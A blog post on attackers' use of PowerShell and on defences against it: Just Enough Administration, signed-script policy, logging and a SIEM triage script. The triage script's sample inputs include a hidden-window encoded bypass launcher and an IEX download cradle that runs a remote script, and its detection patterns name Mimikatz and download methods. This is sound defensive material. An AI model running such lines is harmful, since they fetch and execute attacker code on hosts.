PowerShell is here to stay, but who’s in CMD?

Matthew McDonell
Published in Command Line
4 min read · Mar 16, 2018


By Matthew McDonell, Full-Time Instructor, SecureSet Denver

Home burglars tend to choose their targets based on two factors: the value of what they can steal and how well the home is protected. An empty TV box by the back door or a ground-floor window that is always left half open is an enticing invitation. Conversely, deterrents such as an alarm-company sign on the front lawn, or a large dog barking inside the house, may send a burglar off in search of an easier target.

Threat actors (malicious hackers) choose their ventures the same way: by the value of the target and the level of security employed. Generally speaking, the more deterrents a network has in place, the less likely an attacker is to attempt a breach. Some attackers pick hard targets for reasons beyond these two, but most look for the path of least resistance with the largest potential payoff.

Microsoft PowerShell has become a habitual tool of threat actors. Although PowerShell has gained security features in recent versions (script block logging, transcription and antimalware scanning in PowerShell 5), it still hands an attacker a trusted, Microsoft-signed interpreter that is already present on every Windows host, and it is routinely used to carry out techniques such as pass-the-hash and brute-force password guessing. The attack is rarely on PowerShell itself; PowerShell is the vehicle.

Photo Credit: Microsoft

What is PowerShell?

Microsoft PowerShell is a scripting language and shell framework that is used primarily on Windows and, since the open-source PowerShell Core release, can also be installed on macOS and Linux. PowerShell has been around for more than 10 years and is already replacing the command prompt as the default shell on Windows. It has shipped by default with every Windows release since Windows 7 and Windows Server 2008 R2, and Windows 10 and Windows Server 2016 include PowerShell 5.1 with its logging and hardening features. PowerShell is here to stay.

The current state of things.

Almost all system administrators use PowerShell scripts for daily tasks, such as pulling information from Active Directory or installing and removing software on managed systems across an enterprise network.

While PowerShell is a useful tool for these administrative tasks, attackers regularly use the same scripting language to build their tooling. Symantec's 2016 report on the use of PowerShell in attacks found that 95.4% of the PowerShell scripts it analyzed were malicious. Those were scripts submitted to its malware sandbox, so the sample skews toward suspicious files, but the figure still shows how thoroughly attackers have adopted the language.

Carbon Black, an endpoint security company based in Massachusetts, found that in 2016 threat actors used PowerShell in 38% of over 1,000 security incidents across 28 firms. Nearly one-third (31%) of respondents reported receiving no security alerts before Carbon Black's investigation of their PowerShell-related incidents, which indicates that adversaries are using PowerShell to enter a network and remain there undetected.

87% of the attacks leveraging PowerShell were commodity malware attacks such as click-fraud, fake antivirus, ransomware, and opportunistic malware. Social engineering remains the favored technique for delivering PowerShell-based attacks according to interviews with Carbon Black partners.

How do we prevent these types of attacks?

The increase in these attacks means Blue Teams must learn what they look like as they happen and understand how they work, so that they can be prevented in the first place. It is far better to prevent a breach than to react to one: once the breach has happened, the damage is likely already done, whether it was denial of service, ransomware, data exfiltration or one of the many other outcomes.

Windows Server 2016 (and, through Windows Management Framework 5.1, older supported versions of Windows) ships with Just Enough Administration (JEA), which applies the least-privilege model to PowerShell remoting. A JEA endpoint runs the connecting user's commands under a virtual account, a temporary local account that exists only for the life of the session, or under a group managed service account, instead of under the user's own credentials. Because the user's credentials are never delegated to the server and the virtual account cannot be used to log on anywhere else, an attacker who compromises that session has nothing to pass to the next host, which helps stop lateral movement. It also lets us strip the user's standing permissions down to what the role actually needs.
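Here is what the JEA setup described above looks like in practice. This is an added example, not code from the original post or from Microsoft's documentation; the module name HelpdeskJEA, the role HelpdeskRole, the group CONTOSO\Helpdesk, the transcript path and the host server01 are placeholders chosen for the example.

```powershell
# Added example: a JEA endpoint that gives a helpdesk group exactly three
# capabilities. HelpdeskJEA, HelpdeskRole, CONTOSO\Helpdesk, C:\JEATranscripts
# and server01 are placeholders. Needs PowerShell 5.1 (Windows Server 2016, or
# an older server with WMF 5.1) and an elevated prompt on the server.

# 1. Role capability file: the allow-list of what a connecting user may run.
#    JEA discovers .psrc files in the RoleCapabilities folder of any module
#    on $env:PSModulePath, so the folder has to be a module (hence the manifest).
$moduleDir = Join-Path $env:ProgramFiles 'WindowsPowerShell\Modules\HelpdeskJEA'
$roleDir   = Join-Path $moduleDir 'RoleCapabilities'
New-Item -ItemType Directory -Path $roleDir -Force | Out-Null
New-ModuleManifest -Path (Join-Path $moduleDir 'HelpdeskJEA.psd1') -Description 'JEA role capabilities'

New-PSRoleCapabilityFile -Path (Join-Path $roleDir 'HelpdeskRole.psrc') `
    -VisibleCmdlets @(
        # Restart-Service is exposed, but only for the one service this role owns.
        @{ Name = 'Restart-Service'; Parameters = @{ Name = 'Name'; ValidateSet = 'Spooler' } },
        'Get-Service'
    ) `
    -VisibleFunctions 'Get-Uptime' `
    -FunctionDefinitions @{
        Name        = 'Get-Uptime'
        ScriptBlock = { (Get-Date) - (Get-CimInstance Win32_OperatingSystem).LastBootUpTime }
    }

# 2. Session configuration: who gets which role, and the identity commands run as.
#    RunAsVirtualAccount executes the session as a temporary local account that
#    exists only while the session does. The caller's credentials are never
#    delegated to the server and the virtual account cannot log on anywhere else,
#    so a compromised helpdesk session has nothing to pass to the next host.
#    By default that virtual account is a local Administrator on this server, so
#    it is the role capability, not the account, that bounds what the user can do.
New-Item -ItemType Directory -Path 'C:\JEATranscripts' -Force | Out-Null
$pssc = Join-Path $env:ProgramData 'HelpdeskJEA.pssc'
New-PSSessionConfigurationFile -Path $pssc `
    -SessionType RestrictedRemoteServer `
    -RunAsVirtualAccount `
    -TranscriptDirectory 'C:\JEATranscripts' `
    -RoleDefinitions @{ 'CONTOSO\Helpdesk' = @{ RoleCapabilities = 'HelpdeskRole' } }

# Validate before registering; Register-PSSessionConfiguration restarts WinRM.
if (-not (Test-PSSessionConfigurationFile -Path $pssc)) {
    throw "Invalid session configuration file: $pssc"
}
Register-PSSessionConfiguration -Name HelpdeskJEA -Path $pssc -Force | Out-Null

# 3. From a workstation, as a member of CONTOSO\Helpdesk:
$s = New-PSSession -ComputerName server01 -ConfigurationName HelpdeskJEA
Invoke-Command -Session $s -ScriptBlock { Get-Command }                    # only the allow-list plus a few built-ins
Invoke-Command -Session $s -ScriptBlock { Restart-Service -Name Spooler }  # allowed
Invoke-Command -Session $s -ScriptBlock { Restart-Service -Name WinRM }    # rejected: not in the ValidateSet
Invoke-Command -Session $s -ScriptBlock { Get-Uptime }
Remove-PSSession $s
```

The session runs in NoLanguage mode, so the user cannot define variables, call .NET methods or run anything that is not on the allow-list; the ValidateSet on Restart-Service is what keeps "restart the print spooler" from becoming "restart any service". Every command is also written to the transcript directory, which is the record a SIEM should be collecting.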

With JEA we can also limit the cmdlets, functions and external commands a user may run inside the session to an explicit allow-list, right down to the parameter values they are permitted to pass. In addition, Set-ExecutionPolicy AllSigned requires scripts to be digitally signed before PowerShell will run them; treat this as a guardrail against accidental execution rather than a security boundary, because an attacker who can already run code can start PowerShell with -ExecutionPolicy Bypass. Finally, enable PowerShell 5's script block logging (Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log), module logging (Event ID 4103) and session transcription, and forward them to a SIEM. Those records show exactly which commands a user or administrator executed during a session, and, set up properly, the SIEM will fire alerts or notifications when unauthorized commands or scripts are run.
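The logging and alerting side of this, as an added example that is not from the original post: a function that sets the same registry values the PowerShell Group Policy templates set, followed by a small triage that runs over script block text and flags the patterns commodity PowerShell malware relies on. The SIEM share name, the rule set and the sample script blocks are constructed for the example.

```powershell
# Added example (not from the original post). Part 1 turns on the PowerShell 5
# logging a SIEM needs; part 2 is a first-pass triage over script block text.
# The registry values are the ones the PowerShell Group Policy templates set.
# The SIEM share, rule set and sample script blocks are placeholders/constructed.

function Enable-PowerShellAuditLogging {
    # Needs an elevated prompt. Same effect as the Group Policy settings under
    # Windows Components > Windows PowerShell. Make the transcript share write-only
    # for users so an intruder cannot delete their own transcript.
    param([string]$TranscriptShare = '\\siem01\transcripts$')   # placeholder

    $base = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell'

    # Script block logging -> Event ID 4104 in Microsoft-Windows-PowerShell/Operational.
    # Text is logged as it is compiled, so an -EncodedCommand payload appears decoded.
    New-Item -Path "$base\ScriptBlockLogging" -Force | Out-Null
    Set-ItemProperty -Path "$base\ScriptBlockLogging" -Name EnableScriptBlockLogging -Value 1 -Type DWord

    # Module logging -> Event ID 4103 (pipeline execution details) for all modules.
    New-Item -Path "$base\ModuleLogging\ModuleNames" -Force | Out-Null
    Set-ItemProperty -Path "$base\ModuleLogging" -Name EnableModuleLogging -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\ModuleLogging\ModuleNames" -Name '*' -Value '*'

    # Transcription -> full console text of every session, written to the share.
    New-Item -Path "$base\Transcription" -Force | Out-Null
    Set-ItemProperty -Path "$base\Transcription" -Name EnableTranscripting -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name EnableInvocationHeader -Value 1 -Type DWord
    Set-ItemProperty -Path "$base\Transcription" -Name OutputDirectory -Value $TranscriptShare

    # Guardrail, not a boundary: 'powershell -ExecutionPolicy Bypass' still runs,
    # which is exactly why the triage below alerts on that string.
    Set-ExecutionPolicy -ExecutionPolicy AllSigned -Scope LocalMachine -Force
}

# Part 2. Patterns that rarely appear in legitimate admin scripts but are common in
# commodity PowerShell tradecraft. -match is case-insensitive by default.
$SuspiciousPatterns = [ordered]@{
    EncodedCommand   = '(^|\s)-e(c|nc|ncoded|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}'
    Base64Decode     = 'FromBase64String'
    DownloadCradle   = 'Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|Start-BitsTransfer'
    InvokeExpression = 'Invoke-Expression|\biex\b'
    CredentialTheft  = 'Invoke-Mimikatz|sekurlsa|Get-Keystrokes'
    PolicyBypass     = '-ex(ec|ecutionpolicy)?\s+bypass|-w(indowstyle)?\s+hidden'
    InMemoryLoad     = 'VirtualAlloc|\[Reflection\.Assembly\]::Load|Add-Type.*DllImport'
}

function Find-SuspiciousScriptBlock {
    # Takes raw ScriptBlockText strings; emits one object per block that trips a rule.
    param([Parameter(Mandatory, ValueFromPipeline)][string]$ScriptBlockText)
    process {
        $hits = foreach ($rule in $SuspiciousPatterns.GetEnumerator()) {
            if ($ScriptBlockText -match $rule.Value) { $rule.Key }
        }
        if ($hits) {
            [pscustomobject]@{
                Score   = @($hits).Count
                Rules   = @($hits) -join ','
                Preview = $ScriptBlockText.Substring(0, [Math]::Min(70, $ScriptBlockText.Length))
            }
        }
    }
}

# Constructed sample script blocks standing in for 4104 ScriptBlockText (not real events).
$samples = @(
    'Get-ADUser -Filter * -Properties mail | Export-Csv users.csv'
    'powershell.exe -NoP -W Hidden -Exec Bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA'
    'IEX (New-Object Net.WebClient).DownloadString("http://198.51.100.7/a.ps1")'
    '$b=[Convert]::FromBase64String($x);[Reflection.Assembly]::Load($b)'
)
$samples | Find-SuspiciousScriptBlock | Sort-Object Score -Descending | Format-Table -AutoSize

# Live: the same triage over the newest 500 script block events on this host.
# Property index 2 of a 4104 event holds ScriptBlockText (indexes 0 and 1 count
# the chunks of a long script that was split across several events).
Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
    -MaxEvents 500 -ErrorAction SilentlyContinue |
    ForEach-Object { $_.Properties[2].Value } |
    Find-SuspiciousScriptBlock

# Enable-PowerShellAuditLogging -TranscriptShare '\\siem01\transcripts$'   # run once, elevated
```

Run Enable-PowerShellAuditLogging from an elevated prompt, or push the same values by Group Policy, and then feed the live Get-WinEvent pipeline into whatever ships events to the SIEM. The rules are deliberately coarse; they are a first tier to be tuned against the organization's own administrative scripts, not a verdict, and the benign Get-ADUser sample shows the kind of everyday script that should pass through untouched.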

Great power and great responsibility

PowerShell isn’t going anywhere, and neither are its malicious operators. Just like a homeowner investing in an alarm system, a greater budgetary emphasis on a cybersecurity team will dramatically improve an enterprise’s chances of preventing advanced cyber-attacks and a catastrophic loss of assets. These organizations must provide their security teams with the proper education, tools and personnel needed to mount an effective cyber-defense strategy.

In the end, knowledge is power, and a deep understanding of PowerShell is the first step toward preventing the attacks that leverage it.
